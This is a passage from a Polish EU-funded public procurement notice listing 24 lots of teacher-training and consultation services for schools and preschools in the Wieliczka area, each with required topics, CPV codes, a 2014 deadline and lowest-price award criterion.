<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wypracowanie metod radzenia sobie z dzieckiem z problemami emocjonalnymi będącym w grupie przedszkolnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki Samorządowe Przedszkole w Śledziejowicach, Śledziejowice 203 32-020 Wieliczka Wymagane elementy szkolenia: Program szkolenia musi zawierać zagadnienia: współczesne koncepcje wychowania i wdrażania norm w świetle psychologii rozwojowej; wykorzystanie współczesnych myśli, metod, koncepcji pedagogicznych pomagających w kształtowaniu pożądanych postaw u dzieci przedszkolnych; nowe, twórcze, niesztampowe sposoby radzenia sobie z dziećmi, które nie stosują się do zasad, nowe sposoby przyzwyczajania dzieci i zaznajamiania z zasadami, egzekwowanie zasad, wyciąganie konsekwencji, radzenie sobie z dzieckiem nie stosującym się do zasad w grupie i w obecności grupy; poznanie strategii efektywnych interwencji w sytuacjach niesubordynowanego zachowania dziecka; diagnoza własnych zasobów i ograniczeń w pracy z dzieckiem sprawiającymi trudności; radzenie sobie z własną frustracją w sytuacjach trudnych w przedszkolu; przykłady ułatwiających rozładowanie napięcia emocjonalnego u dzieci. Konsultacje w zakresie: rozwinięcie i uzupełnienie treści ze szkolenia ze szczególnym uwzględnieniem następującej tematyki: masaż dla dzieci (warsztat), przykłady dobrych praktyk; radzenie sobie z trudnościami na przykładzie konkretnych sytuacji z życia przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jak sobie radzić z prowokacyjnymi i agresywnymi zachowaniami uczniów? Metoda Konstruktywnej Konfrontacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Świętej Kingi Książnicach Książnice191, 32-420 Gdów Wymagane elementy szkolenia: Program szkolenia musi zawierać zagadnienia: - wykład interaktywny w oparciu o prezentację multimedialną, z elementami warsztatu, - analiza typowych sposobów reagowania na trudne zachowania uczniów, czynników je warunkujących oraz mechanizmów eskalacji tych zachowań, - zasady budowania pozytywnego klimatu społecznego w klasie, - prezentacja właściwego i bezpiecznego sposobu reagowania na prowokacyjne i agresywne zachowania uczniów w postaci Metody Konstruktywnej Konfrontacji - praktyczne zastosowanie, - przykłady dobrych praktyk. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Metody aktywizujące w pracy nauczyciela..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Ojca Świętego Jana Pawła II w Niegowici, Niegowić 62 32-420 Gdów Wymagane elementy szkolenia: Program szkolenia musi zawierać zagadnienia: metody i techniki podnoszące aktywność uczniów na lekcji, motywowanie do nauki. Przy konstruowaniu programu należy zwrócić uwagę na metody problemowe np. burza mózgów, drzewo decyzyjne, a także pracę uczniów w grupie. Konsultacje w zakresie: metody pracy z uczniem zdolnym i słabym, jak rozwijać myślenie logiczno - matematyczne u dzieci.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zastosowanie metody projektowej w szkole podstawowej na wybranym materiale..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa i. Kornela Makuszyńskiego w Gorzkowie, Gorzków 168 32-020 Wieliczka Wymagane elementy szkolenia: Program szkolenia musi zawierać następujące zagadnienia: ukazanie sensu i pozytywnych aspektów pracy metodą projektową w szkole podstawowej - motywowanie; cechy dobrego projektu w szkole podstawowej; propozycje narzędzi przydatnych do pracy metodą projektu; konkretne ćwiczenia wstępne przygotowujące grupę do podziału i pracy w małych zespołach projektowych; radzenie sobie z możliwymi trudnościami; konkretne propozycje projektów dla sp - przykłady dobrych praktyk. Konsultacje w zakresie: dyskusja nad tym, jak oceniać pracę w projektach, jak włączyć ją w program nauczania; konsultacje dotyczące konkretnych projektów w sp; radzenie sobie z ewentualnymi trudnościami; ocena rezultatów projektu - uwagi praktyczne; dobre praktyki. Sugerowane konsultacje grupowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ugruntowanie wiedzy na temat etapów rozwojowych dzieci w wieku 3-12 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Królowej Jadwigi w Sierczy, Siercza 428 32-020 Wieliczka Wymagane elementy szkolenia: Program szkolenia musi zawierać następujące zagadnienia: Dostarczenie praktycznej, konkretnej wiedzy dotyczącej normy rozwojowej i zaburzeń u dziecka (w wieku 3-12 lat) - psychologia rozwojowa, etapy rozwojowe, rozumienie norm na poszczególnych etapach rozwojowych; propozycje radzenia sobie z trudnymi zachowaniami u dzieci na każdym etapie rozwoju 
Konsultacje grupowe dotyczące konkretnych uczniów i sytuacji w szkole. Analiza konkretnych przykładów ze szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Jak motywować uczniów do nauki - techniki uczenia i metody aktywizujące w praktyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa - Zespół Szkół im. Ks. Jerzego Popiełuszki w Brzeziu,  362, 32-014, Brzezie. Wymagane elementy szkolenia: Przegląd aktualnie stosowanych w Polsce i na świecie metod motywowania uczniów, wzmacniania ich kreatywności i aktywności własnej. Metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów. Gry i zabawy rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników. Przykłady dobrych praktyk. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rozmowa motywująca nauczyciel - uczeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Technikum - Zespół Szkół Zawodowych im. Edwarda Dembowskiego w Wieliczce Wymagane elementy szkolenia: Program szkolenia musi zawierać następujące zagadnienia: sposoby prowadzenia motywującej rozmowy z uczniem szkoły ponadgimnazjalnej (uczniem z problemami, niechętnym do nauki, oporującym). Konsultacje w zakresie: motywująca rola nowych technologii w kształceniu uczniów z podziałem na zespoły: humanistyczne, matematyczno - przyrodnicze, zawodowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Jak podnieść frekwencję uczniów w szkole?..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Zasadnicza Szkoła Zawodowa - Zespół Szkół Zawodowych im. Edwarda Dembowskiego w Wieliczce Wymagane elementy szkolenia: Program szkolenia musi zawierać następujące zagadnienia: jak zachęcić ucznia do chodzenia do szkoły, chodzi o ucznia trudnego (często z rodzin patologicznych, o obniżonych możliwościach intelektualnych, zazwyczaj są to uczniowie klas wielozawodowych) oraz konkretne przykłady, ćwiczenia. Konsultacje w zakresie: sposoby motywowania ucznia trudnego (konkretne ćwiczenia), integracja zespołu klasowego ( konkretne ćwiczenia), kształtowanie właściwych relacji miedzy uczniami, kształtowanie postaw asertywnych ( konkretne ćwiczenia). Grupa docelowa konsultacji nauczyciele pracujący z trudnym uczniem szkoły zawodowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Nowocześnie uczyć, nowocześnie motywować.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Technikum - Zespół Szkół im. Ojca Świętego Jana Pawła II w Niepołomicach Plac Kazimierza Wielkiego 1, 32-005 Niepołomice Wymagane elementy szkolenia: Program szkolenia musi zawierać następujące zagadnienia: nowoczesne i niestandardowe techniki i metody nauczania zarówno ucznia słabego jak i zdolnego (szkolenie w zakresie technik nauczania oraz metod aktywizujących z uwzględnieniem nauczanych przedmiotów ogólnokształcących i zawodowych w szkolnictwie ponadgimnazjalnym, zwłaszcza w technikum i liceum ogólnokształcącym. Konsultacje w zakresie: tematyki szkolenia realizowane w ramach 5 zespołów: a/ humanistycznego (nauczane przedmioty: j. polski, historia, wos), b/ matematycznego (nauczane przedmioty: matematyka, fizyka, chemia), c/ zawodowego (nauczane przedmioty: informatyka, ekonomia, ekonomika, marketing, rachunkowość, podstawy przedsiębiorczości, statystyka itp.), d/ języków obcych (nauczane przedmioty: j. angielski, j. niemiecki, j. francuski, j. włoski), e/ pozostali członkowie zespołu (nauczane przedmioty: geografia, przyroda, biologia, przysposobienie obronne, wychowanie fizyczne)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Agresja w szkole - metody przeciwdziałania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Zasadnicza Szkoła Zawodowa - Zespół Szkół w Gdowie, Gdów 405, 32-420 Gdów. Wymagane elementy szkolenia: Program szkolenia musi zawierać treści dotyczące form agresji, metod przeciwdziałania agresji, sposobu zachowania nauczyciela w sytuacjach trudnych. Konsultacje w zakresie: metody rozpoznawania potrzeb wychowawczych uczniów, zasady planowania i monitorowania oddziaływań wychowawczych. Zagrożenia wewnątrz i zewnątrz szkolne (uzależnienia, przemoc, grupy nieformalne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Efektywna organizacja pracy zespołów nauczycielskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Liceum Ogólnokształcące im. Jana Matejki w Wieliczce, ul. Piłsudskiego 18 32-020 Wieliczka Wymagane elementy szkolenia: Tworzenie zespołu, określanie ról jego członków, podział zadań, ew. praca zespołu metodą projektów. Kształtowanie pozytywnych i bezpiecznych relacji wśród pracowników. Organizacja i monitorowanie pracy zespołu. Doskonalenie kompetencji interpersonalnych poprawiających efektywność pracy zespołowej. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Metody podnoszące efektywność nauczania w Szkole Podstawowej - strategie twórczego myślenia, metody aktywne, indywidualizacja pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa w Zespole Szkół Ogólnokształcących w Targowisku Targowisko 313 32-015 Kłaj. Wymagane elementy szkolenia: zapoznanie ze specyfiką strategii podnoszących efektywność nauczania w odniesieniu wieku rozwojowego (edukacja wczesnoszkolna, edukacja w klasach IV-VI); zapoznanie z praktycznymi wskazaniami dotyczącymi indywidualizacji pracy z uczniami na poziomie szkoły podstawowej (I-III oraz IV-VI); zapoznanie z możliwościami pobudzania twórczego myślenia uczniów, prezentacja sprawdzonych metod; zapoznanie z najnowszymi aktywnymi metodami uczenia; prezentacja sprawdzonych sposobów efektywnego włączania rodziców w proces edukacyjny - w jaki sposób instruować rodziców do pracy z dziećmi, praktyczne zalecenia do pracy z rodzicami podnoszące efektywność nauczania. Konsultacje: Przeprowadzenie wspólnie z nauczycielem lekcji z praktyczną demonstracją wykorzystywania technik prezentowanych na szkoleniu w pracy z uczniami poszczególnych klas.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Metody podnoszące efektywność nauczania w Gimnazjum - strategie twórczego myślenia, metody aktywne, indywidualizacja pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum w Zespole Szkół Ogólnokształcących w Targowisku Targowisko 313 32-015 Kłaj. Wymagane elementy szkolenia: zapoznanie ze specyfiką strategii podnoszących efektywność nauczania w odniesieniu do wieku rozwojowego; zapoznanie z praktycznymi wskazaniami dotyczącymi indywidualizacji pracy z uczniami na poziomie gimnazjum; zapoznanie z możliwościami pobudzania twórczego myślenia uczniów, prezentacja sprawdzonych metod; zapoznanie z najnowszymi aktywnymi metodami uczenia. Konsultacje: przeprowadzenie wspólnie z nauczycielem lekcji z praktyczną demonstracją wykorzystywania tech.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Automotywacja - Jak efektywnie motywować siebie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Gimnazjum im. Ks. Jana Twardowskiego w Zabierzowie Bocheńskim 32-007 Zabierzów Bocheński 323. Wymagane elementy szkolenia: diagnoza posiadanych strategii motywowania, praca na własnych przekonaniach i systemie wartości; efektywne strategie motywowania siebie - przegląd i przepracowanie z grupą co najmniej 3 strategii pozwalających zmieniać własną motywację; jak zarządzać własną motywacją - przepracowywanie blokad motywacyjnych i skutecznych metod autocoachingu, pozwalających na samodzielne motywowanie siebie do realizacji zakładanych celów; budowanie motywujących celów oraz strategii działań podtrzymujących motywację
Konsultacje w formie warsztatowej:  zapoznanie ze specyfiką pracy coachingowej oraz pracy ze sportowcami, inspirowanie do działania i pokonywania własnych ograniczeń; kierunki i perspektywy coachingowego wsparcia sportowców, prezentacja i praktyczne stosowanie przykładowych narzędzi coachingowych używanych w pracy ze sportowca.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Stosowanie TIK, wykorzystanie tablicy interaktywnej, rzutnika i innych narzędzi do pracy dydaktycznej na przedmiotach nieinformatycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Obrońców Westerplatte w Koźmicach Wielkich,Koźmice Wielkie 1 32-020 Wieliczka. Wymagane elementy szkolenia: TIK w edukacji - praktyczne przykłady, wykorzystanie posiadanych w szkole 3 tablic interaktywnych oraz oprogramowania do nich; jak poszukiwać nowego oprogramowania do tablic interaktywnych i stosowania na przedmiotach nieinformatycznych, przykłady takich narzędzi; metodyka stosowania TIK w edukacji w szkole podstawowej (szanse i ograniczenia). Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Kwestie prawne w systemie kar i nagród oraz prawo a obowiązki rodzicielskie oraz motywowanie rodziców do współpracy - pokazywanie długofalowych celów odpowiednich oddziaływań wychowawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Adama Mickiewicza w Staniątkach, Staniątki 5 32-005 Niepołomice. Wymagane elementy szkolenia: zapoznanie z ustawami i rozporządzeniami mającymi znaczenie w pracy z rodzicami, m.in. z przepisami pozwalającymi na wprowadzenie kar i nagród wobec uczniów, refleksja nad aktualnymi dokumentami szkoły w tym zakresie i ewentualne wprowadzenie w nich zmian; zapoznanie z przepisami prawnymi dotyczącymi obowiązków rodzicielskich. Przekazanie sposobów odwoływania się do informacji prawnych w kontakcie z rodzicami, tak by budować efektywną współpracę; prezentacja przykładowych interwencji wobec rodziców z odniesieniem się do kwestii prawnych; jak zapoznawać rodziców z wymaganiami prawnymi nakładanymi na rodziców oraz z aktami prawnymi  obowiązującymi w szkole. Aktywne metody pracy  ułatwiające zdobycie wiedzy rodzicom; przekazanie informacji n.t. budowania kontaktu z rodzicami; gry interpersonalne, do których zapraszają rodzice - jak je rozpoznawać i efektywnie sobie z nimi radzić; elementy pedagogizacji na zebraniach rodzicielskich. Jak zwięźle przekazywać inforamcje  kluczowe dla rodziców dzieci na różnych etapach rozwoju; jak zachęcać rodziców do współpracy - praktyczne sposoby budowania relacji z rodzicami - wskazówki do pracy własnej nauczycieli. Konsultacje w zakresie: przeprowadzenie wraz z nauczycielami 5 zebrań rodzicielskich. Podczas zajęć ważne będzie położenie nacisku na praktyczne zaprezentowanie technik pobudzających motywację rodziców do współpracy ze szkołą oraz przekazanie informacji psychoedukacyjnych - ważnych dla rodziców dzieci na aktualnym etapie rozwoju.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Być dobrym wychowawcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa nr 4 im. E. J Jerzmanowskiego w Wieliczce.   
ul. Krzyszkowicka 18a 32-020 Wieliczka. Wymagane elementy szkolenia: ABC wychowawcy, rozwiązywanie konfliktów w szkole, nauczyciel wobec trudnych zachowań uczniów, współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów. Konsultacje w zakresie: rozwiązywanie konfliktów w szkole, nauczyciel wobec trudnych zachowań uczniów - superwizja, współpraca z rodzicami - doskonalenie umiejętności interpersonalnych, radzenie sobie z możliwymi trudnościami; konkretne przykłady dobrych praktyk, praca z uczniami w zakresie rozpoznawania uczuć, radzenia sobie ze złością, komunikacji, rozwiązywania konfliktów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Sposoby motywowania uczniów do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa w Byszycach  Byszyce 1, 32-020 Wieliczka.  Wymagane elementy szkolenia: praktyczne metody motywowania uczniów, wzmacnianie kreatywności i aktywności własnej uczniów. Rozwijanie odpowiedzialności uczniów za własny sukces dydaktyczny; metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów; praktyczne twórcze techniki, gry i zabawy rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Radzenie sobie z trudnościami emocjonalnymi i wychowawczymi u uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Gen. Jana Henryka Dąbrowskiego w Pierzchowie,   
Pierzchów 100 , 32-420 Gdów. Wymagane elementy szkolenia: szkolenie prowadzone metodą aktywną - warsztaty dla nauczycieli, np. w formie psychodramy. Ponadto praktyczne sposoby radzenia sobie przez nauczycieli  z trudnościami emocjonalnymi i wychowawczymi  u uczniów (szkoła podstawowa), rozwiązywanie konkretnych problemów, poprawa komunikacji z uczniem. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Sposoby motywowania uczniów do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Orła Białego w Marszowicach Marszowice 149, 32-420 Gdów. Wymagane elementy szkolenia: praktyczne metody motywowania uczniów, wzmacnianie kreatywności i aktywności własnej uczniów. Rozwijanie odpowiedzialności uczniów za własny sukces dydaktyczny; metody wzbudzania ciekawości poznawczej u uczniów; rozwijanie samodzielności i wytrwałości uczniów w obszarze zdobywania wiedzy i rozwiązywaniu problemów; praktyczne twórcze techniki, gry i zabawy rozbudzające motywację - do zastosowania na każdym przedmiocie oraz dostosowane do specyfiki przedmiotów nauczanych przez uczestników. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Metody i narzędzie potrzebne do przeprowadzenia ewaluacji wewnętrznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Świętej Kingi w Bilczycach; Bilczyce 92, 32-420 Gdów. Wymagane elementy szkolenia: praktyczne metody i narzędzia potrzebne do przeprowadzenia ewaluacji wewnętrznej w szkole. Konsultacje w zakresie tematyki szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Rozwijanie kompetencji językowych u dzieci w normie rozwojowej, ze specjalnymi potrzebami edukacyjnymi oraz dwujęzycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Przedszkole nr  5 im. Brata Alojzego Kosiby w Wieliczce, ul. W. Pola 23, 32-020, Wieliczka. Wymagane elementy szkolenia: Praktyczne metody rozwijania kompetencji językowych dzieci w wieku przedszkolnym, ze szczególnym uwzględnieniem różnych metod pracy. Konsultacje w zakresie szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pomysły na zabawę z dziećmi w szkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa placówki: Szkoła Podstawowa im. Janusza Korczaka w Węgrzcach Wielkich, Węgrzce Wielkie 19032-002 Węgrzce Wielkie. Wymagane elementy szkolenia: poznanie wielu różnorodnych ćwiczeń gier i zabaw ruchowych dla małych dzieci, które można zastosować również ze starszymi dziećmi; poznanie przykładów ćwiczeń z wykorzystaniem nietypowych przyborów; zdobycie umiejętności organizowania oraz wymyślania różnych form aktywności ruchowej dla dzieci np. przebywających na świetlicy; przykłady ułatwiających rozładowanie napięcia emocjonalnego u dzieci, radzenie sobie z frustracją, złością, przykłady dobrych praktyk; sposoby radzenia sobie przez dzieci z trudnymi emocjami (niepowodzenie, porażka, złość, strach). Sugerowana forma warsztatowa. Konsultacje w zakresie tematyki szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Praca z dzieckiem ze spektrum autyzmu w przedszkolu.</p>
